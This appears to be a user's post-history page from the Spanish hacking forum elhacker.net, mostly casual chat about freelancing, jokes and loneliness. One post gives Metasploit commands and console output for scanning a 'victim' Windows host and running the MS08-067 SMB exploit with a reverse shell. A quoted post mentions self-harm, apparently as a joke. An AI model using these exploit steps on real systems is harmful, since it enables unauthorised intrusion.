elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12
71  Seguridad Informática / Hacking / Re: ayuda con error en pestenting metasploit porque este error?????? en: 3 Agosto 2019, 03:36 am
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost XXX.XXX.XXX (ip victima)
rhost => 192.168.1.xxx
msf5 exploit(windows/smb/ms08_067_netapi) > set lhost XXX.XXX.XXX (mi ip)
lhost => 192.168.1.xxx
msf5 exploit(windows/smb/ms08_067_netapi) > exploit

  • Started reverse TCP handler on 192.168.1.XXX:4444
  • 192.168.1.XXX:445 - Automatically detecting the target...
  • 192.168.1.XXX:445 - Fingerprint: Windows 7 - Service Pack 1 - lang:Unknown
  • 192.168.1.XXX:445 - We could not detect the language pack, defaulting to English
  • [-] 192.168.1.XXX:445 - Exploit aborted due to failure: no-target: No matching target
  • Exploit completed, but no session was created. <<<<< porque????
msf5 exploit(windows/smb/ms08_067_netapi) >

que estoy haciendo mal?


Ni siquiera especificas que version estas atacando..

windows/smb/ms08_067_netapi explota una falla en la interpretación de la ruta del código de canonización de NetAPI32.dll a través del servicio Server.

Claramente te esta diciendo que no esta haciendo match con el objetivo, asi que valla uno a saber si la colocaste correctamente pero vamos a suponer que si.

Has un escaneo para verificar si es vulnerable..

Código:
> search ms08_067_check
> use auxiliary/scanner/smb/ms08_067_check
> show options
> set RHOSTS 192.168.x.x
> run

#Luego se vuleve a proceder:

> search ms08_067_netapi
> use exploit/windows/smb/ms08_067_netapi
> show options
> set RHOST 192.168.x.x
>set PAYLOAD xx/xx/xx
>exploit

Es teoria eso deberia bastar, pero Igual con la pobre información que proporcionas no hay mucho que decir...
72  Seguridad Informática / Hacking / Re: Sistema operativo para moviles para hacking? en: 3 Agosto 2019, 02:18 am
Pues Kali Linux en Movil  ... :¬¬

Pero para mi eso no es verdadero hacking.. si vas a hablar de hacking entonces busca en la lista de CVE database, elige el lenguaje de programación que te venga en gana y crea tu propio .APK-exploit/encoder/payload.    ... El 95% no se tomarian la gran molestia de hacerlo, pero al 5% que si lo hacen se les conoce como Hackers.. el resto son puras estupideces..
                                                                                                                    
                                                                                                              
73  Foros Generales / Foro Libre / Re: Empleo en: 3 Agosto 2019, 01:22 am
. No soy un profesional del desarrollo pero soy capaz de sacar proyectos a medida que aprendo debido al tiempo que le dedico.
Hace años ponías "Realizo aplicaciones de escritorio, móvil y web" "¿Quieres tener tu propia aplicación/programa?" Y te llovían ofertas y proyectos de horas que te pagaban entre 50 y 150€, pero ahora o está saturado o la demanda está cubierta por otros medios.

Yo diria que si eres un profesional por que no cometiste el error que yo cometi de ingresar a una Universidad a perder el tiempo, yo siempre que mido mis habilidades frente a una persona que jamas piso una universidad y que aprendio solo como freelance, siempre me da una verdadera paliza y es por que los que aprendieron a programar de forma empírica (o autodidacta) lo hacen para ganarse la vida o para sobrevivir, y es esa necesidad y el hambre la que los lleva superar los limites.. Por eso estoy pensando seriamente en abandonar la universidad e ir directo a dedicar 100% de mi tiempo como desarrollador freelance.  
                                                                                 
                                                                                         :silbar:
74  Foros Generales / Foro Libre / Re: Empleo en: 28 Julio 2019, 23:59 pm
freelancer.com
fiverr
hired
upwork
toptal
github jobs
servicescape
indeed
guru
cloudpeeps


      :o
¿Y segun tu experiencia personal si pagan bien? ¿Es muy dificil? ...¿Cual le recomiendarias a una persona sin experiencia que apenas quiera iniciarse como freelance? ..
75  Foros Generales / Foro Libre / Re: Empleo en: 28 Julio 2019, 00:38 am
Si eres muy bueno en algo, lo mejor es hacer proyectos de freelancer. Puedes hacer mucho dinero si tienes tiempo libre. Lo malo es que hay mucha competencia para pillar proyectos. Si te manejas decente pero no como para este tipos de páginas, puedes usar varias páginas para ofrecer tus habilidades. Tipo: Realizo programas y aplicaciones básicas en los lenguajes de programacion x y z... Ofrezco clases a distancia o presenciales en la ciudad X y cercanias. Clases ofrecidas: Introduccion al diseño web en html, introducción al manejo de aplicaciones web, bla bla bla. Reparo sistemas, hago equipos a medida segun necesidades del consumidor, montaje y mantenimiento de servidores....

Lo que sepas hacer pues ponlo y muévete. Hay un montón de páginas tipos milanuncios segundamano etc donde puedes ofertar este tipo de servicios. Lo mismo puedes imprimir unos papeles con un número telefonico que tengas para esto y los servicios que ofreces. Pégalos en farolas, pregunta si te los dejan poner en puertas de locales.

Si te mueves a los 3 días no das hecho con tanto trabajo.

No pongas cosas que no sepas hacer, y menos aún no aceptes proyectos que no puedas cumplir totalmente o en plazo. E indícaselo al cliente.

Cuando ganes bien empiezas a declarar y te pagas la seguridad social si algún día quieres jubilarte o tener una baja médica con gastos cubiertos.

El gobierno ofrece un montón de ayudas para jóvenes, empresarios y autónomos. Si te va bien puedes montar algo modesto.


Que paginas freelance conoces tu ademas de workana?..
76  Foros Generales / Foro Libre / Re: Empleo en: 26 Julio 2019, 04:22 am
Pues eso depende del pais en el que tengas pensado trabajar, de haber hay muchas. pero la mayoria ofrecen unos empleos de mierd@ que te quedas pensando si es peor cojerlos o solo dejarse morir de hambre..

O tambien las tipicas ofertas de empleos buenos y bien pagados pero que te piden 50 años de experiencia, 4 doctorados, 7 maestrias, dominar 9 lenguajes de programacion, 4 idiomas, dos viajes a la estación espacial internacional (que esten certificados por na NASA), haber perdido la virgindad antes de los 14 años, ser hijo de un politico, 15 partidas de Fornite completadas y pasar la prueba de poligrafo. (se valora conocimiento en excel y photoshop) ...
                                                                                    
                                                                                                         :¬¬ :¬¬ :¬¬ :¬¬ :¬¬
77  Foros Generales / Foro Libre / Re: España, el país que más se masturba de Europa en: 17 Julio 2019, 22:35 pm

Alguna vez un sabio filosofo dijo: - " CON PAREJA O SIN PAREJA, LA PAJA NO SE DEJA"  :v


 :silbar: :silbar: :silbar: :silbar: :silbar:
78  Foros Generales / Foro Libre / Re: Asteroid FT3 se acercará peligrosamente a la Tierra en octubre en: 11 Julio 2019, 23:48 pm
Preferis creer en estas idioteces que en que Dios es el unico que decide cuando la tierra se va a acabar?


79  Foros Generales / Foro Libre / Re: Falta de motivación. en: 11 Julio 2019, 01:40 am
Si tu supieras lo mal que me va a mi en las relaciones sociales...


Si.... es como digo... que mas me queda en la vida que ponerme a picar codigo a solas y a oscuras en mi habitación cuando ya se que alla afuera no hay nada para mi..
                         
                                                                                                          :xD  :¬¬ :-\
 
80  Foros Generales / Foro Libre / Re: Falta de motivación. en: 11 Julio 2019, 00:22 am
Hola, me gustaría describirme y escribir este texto para desahogarme.
Desde que era pequeňo y mi adolescencia he crecido con falta de autoestima. Siempre he tenido mala imagen de mi mismo. Tengo miedo a cometer maldades porque soy una persona malvada y peligrosa. Las cosas nunca resultan como yo quiero y me siento inferior a los demás. Tengo mucho miedo y soy una persona tímida asique entiende que estoy haciendo un gran esfuerzo al escribir como me siento. Creo que nadie se siente como yo. Desconfio de todos, me siento deprimido, triste y como que todo me da igual. Necesito llamar la atención constantemente para que alguien me escuche y sentirme apollado.
Nunca he podido comprender como funciona el mundo y a veces llego a autolesionarme.

Seguro que nadie más ha sentido todo esto...
Me quedan como recuerdo las sabias palabras que me dijo mi tío Cesar cuando yo tenía 13 aňos. Ry grkgb nagrevbe rf ha ubarlcbg wrwr
La vida no vale la pena sin aceptarse a uno mismo.


No se si lo diras enserio o solo por joder pero ya que lo mensionas cada dia mas me voy convenciendo de que ese supuesto cliche de que los informaticos somos unos fracasados es mas real de lo que imagine.

Mirame a mi por ejemplo que hace algun tiempo hice un post aca pidiendo consejos sobre que hacer debido a que la chica que me gustaba y de la que estaba enamorado en secreto me habia mandado directo a la friendzone..  Y al dia de hoy nada ha cambiado, sigo siendo el mismo perdedor con las mujeres que no sabe como reaccionar ante ellas.

Seguro hay excepciones, pero esto de vivir con crisis exitenciales continuas y ser un perdedor en el amor parece que ya se puede describir como el síndrome del informático..   :'v    
                                                                                           :xD :xD :xD :xD
 
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines